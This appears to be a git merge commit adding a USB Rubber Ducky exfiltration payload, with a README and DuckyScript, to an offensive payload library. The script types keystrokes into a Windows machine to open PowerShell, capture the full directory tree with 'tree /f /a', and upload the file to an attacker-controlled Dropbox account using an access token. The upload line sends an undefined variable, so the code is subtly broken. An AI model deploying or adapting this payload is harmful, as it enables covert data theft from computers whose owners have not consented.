Merge pull request #339 from aleff-github/patch-58

Tree Structure Of The Operating System
2024-01-08 02:20:26 -05:00 · 2024-01-08 02:20:26 -05:00 · aca79ca70b
parent ef35f52d18 d5b3419ff9
commit aca79ca70b
3 changed files with 124 additions and 0 deletions
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/1.png
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
@ -0,0 +1,58 @@
+# Tree Structure Of The Operating System
+
+This script allows the exfiltration of the structure of the files contained in a machine, through the use of the tree command in fact it is possible to know all the various links between files, folders and subfolders in a quick and graphically easy to understand way.
+
+**Category**: Exfiltration
+
+![](1.png)
+
+## Description
+
+This script allows the exfiltration of the structure of the files contained in a machine, through the use of the tree command in fact it is possible to know all the various links between files, folders and subfolders in a quick and graphically easy to understand way.
+
+Open a PowerShell and run the command `tree /f /a > out.txt` that permit to list the file name and not only the directories, using text characters instead of graphic characters to display rows linking subdirectories. Save all the output in the out.txt file and then send this file through Dropbox.
+
+I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready) extension.
+
+## Dependencies
+
+* Firefox must be installed
+
+## Settings
+
+- You must define your Dropbox accessToken or modify the exfiltration modality.
+
+    `DEFINE #DROPBOX_ACCESS_TOKEN example`
+
+- The path to check can be changed putting the full-path `tree <full-path> /f /a > out.txt`.
+
+    - `tree \ /f /a > out.txt`
+    - `tree C:\Users\Aleff\Documents /f /a > out.txt`
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
+      </a>
+      <br>Instagram
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Discord
+    </td>
+  </tr>
+</table>
+</div>
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
@ -0,0 +1,66 @@
+REM ###########################################################
+REM #                                                         |
+REM # Title        : Tree Structure Of The Operating System   |
+REM # Author       : Aleff                                    |
+REM # Version      : 1.0                                      |
+REM # Category     : Exfiltration                             |
+REM # Target       : Windows 10-11                            |
+REM #                                                         |
+REM ###########################################################
+
+REM Requirements:
+REM     - Internet connection
+
+REM Set yout Dropbox access token
+DEFINE #DROPBOX_ACCESS_TOKEN example
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+GUI r
+DELAY 1000
+STRINGLN PowerShell
+DELAY 1000
+
+REM Setting about exfiltration
+STRINGLN_BLOCK
+    tree /f /a > out.txt
+    $filePath=".\out.txt";
+    $accessToken="#DROPBOX_ACCESS_TOKEN"
+    $authHeader = @{Authorization = "Bearer $accessToken"}
+    $dropboxFilePath = "/out_exported.txt"
+
+    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+    $headers = @{}
+    $headers.Add("Authorization", "Bearer $accessToken")
+    $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+    $headers.Add("Content-Type", "application/octet-stream")
+
+    Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent; exit;
+END_STRINGLN